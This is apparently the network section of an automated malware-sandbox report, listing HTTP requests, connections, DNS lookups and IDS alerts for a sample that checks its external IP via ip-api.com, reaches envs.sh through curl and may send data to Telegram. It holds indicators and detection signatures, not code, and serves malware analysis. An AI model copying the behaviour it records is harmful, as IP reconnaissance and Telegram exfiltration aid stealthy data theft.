Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
23.48.23.156:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2736
svchost.exe
GET
200
23.48.23.156:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2736
svchost.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
7672
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6152
lJL.exe
GET
200
208.95.112.1:80
http://ip-api.com/line/?fields=hosting
unknown
shared
6152
lJL.exe
GET
200
208.95.112.1:80
http://ip-api.com/json/?fields=225545
unknown
shared
6388
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
7672
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.168.100.255:137
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2736
svchost.exe
23.48.23.156:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
23.48.23.156:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
2736
svchost.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5064
SearchApp.exe
104.126.37.162:443
www.bing.com
Akamai International B.V.
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
6312
curl.exe
89.163.145.170:443
envs.sh
myLoc managed IT AG
DE
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 40.127.240.158
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 184.30.21.171
  • 88.221.169.152
whitelisted
google.com
  • 142.250.181.238
whitelisted
www.bing.com
  • 104.126.37.162
  • 104.126.37.131
  • 104.126.37.137
  • 104.126.37.139
  • 104.126.37.130
  • 104.126.37.155
  • 104.126.37.163
  • 104.126.37.154
  • 104.126.37.153
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
envs.sh
  • 89.163.145.170
unknown
login.live.com
  • 20.190.159.68
  • 20.190.159.2
  • 40.126.31.67
  • 40.126.31.71
  • 20.190.159.73
  • 40.126.31.69
  • 20.190.159.4
  • 20.190.159.0
whitelisted
go.microsoft.com
  • 23.218.210.69
whitelisted
ip-api.com
  • 208.95.112.1
shared

Threats

PID
Process
Class
Message
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Check (ip-api .com)
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
Device Retrieving External IP Address Detected
POLICY [ANY.RUN] External Hosting Lookup by ip-api
Not Suspicious Traffic
INFO [ANY.RUN] Online Pastebin Text Storage
Misc activity
SUSPICIOUS [ANY.RUN] Possible sending an external IP address to Telegram
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
Misc activity
ET HUNTING Telegram API Certificate Observed
Misc activity
ET HUNTING Telegram API Domain in DNS Lookup
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
No debug info